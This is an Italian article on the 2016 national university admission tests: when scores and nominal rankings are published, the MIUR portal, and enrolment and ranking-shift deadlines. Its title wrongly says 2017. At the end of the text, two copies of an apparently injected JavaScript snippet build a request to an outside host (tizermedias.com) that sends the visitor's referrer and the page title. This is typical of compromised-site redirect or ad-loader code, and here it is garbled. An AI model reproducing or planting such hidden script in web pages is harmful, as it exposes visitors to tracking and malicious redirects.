calendario test d'ammissione 2017

La maggior parte dei test d’ammissione 2016 per l’accesso ai corsi di laurea a numero programmato a livello nazionale si è già svolta, a eccezione di quello per Scienze della Formazione primaria, ma per sapere chi tra i candidati sarà riuscito a conquistarsi un posto e chi, invece, dovrà ritentare l’anno prossimo, occorre attendere ancora qualche giorno.

Il primo passo, dopo la pubblicazione dei questionari con l’indicazione delle risposte corrette, che il MIUR ha provveduto a mettere online poche ore dopo lo svolgimento di ciascuna prova, sarà quello della diffusione dei punteggi dei test d’ammissione 2016. Ciascuno studente potrà conoscere l’esito del proprio esame sul sito http://accessoprogrammato.miur.it/ e per qualcuno arriveranno già delle sentenze definitive. Chi, infatti, non avrà totalizzato almeno il punteggio minimo sarà già fuori dai giochi.

 

Le date nelle quali saranno resi noti i punteggi ottenuti dai candidati nei test d’ammissione 2016 sono le seguenti:

  • Medicina e Chirurgia e Odontoiatria e Protesi dentaria – 20 settembre 2016;
  • Medicina Veterinaria – 21 settembre 2016;
  • Architettura – 22 settembre 2016.

In questa prima fase gli studenti conosceranno unicamente il proprio punteggio, mentre il prossimo 29 settembre ciascuno di essi potrà accedere all’area riservata del portale UniversItaly e visionare il proprio elaborato e la propria scheda anagrafica.

Per quanti saranno riusciti a ottenere un risultato utile, il destino si svelerà il 4 ottobre, quando saranno pubblicate le graduatorie nazionali nominative dei test d’ammissione 2016. A quel punto i candidati scopriranno se risultano assegnati, perché rientrano tra i posti disponibili relativi all’ateneo indicato come prima preferenza utile, oppure prenotati, se non rientrano tra i posti disponibili nella prima sede utile, ma hanno un punteggio che consentirebbe loro di immatricolarsi presso una delle sedi indicate come preferenze successive.

Gli studenti assegnati e prenotati avranno 4 giorni, compreso quello di pubblicazione della graduatoria, per perfezionare l’immatricolazione. Occorre tuttavia precisare che per i primi la mancata immatricolazione nei tempi previsti comporta la decadenza dalla graduatoria, mentre per i secondi no.

Il successivo scorrimento delle graduatorie nazionali dei test d’ammissione 2016 – che terrà conto delle immatricolazioni e delle rinunce nel frattempo pervenute – sarà pubblicato l’11 ottobre. In base ai posti che rimarranno disponibili nelle varie sedi si procederà poi a ulteriori scorrimenti, ma il termine perentorio entro il quale il MIUR ha stabilito che verranno chiuse le graduatorie è la fine del primo semestre dell’anno accademico 2016-2017.(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();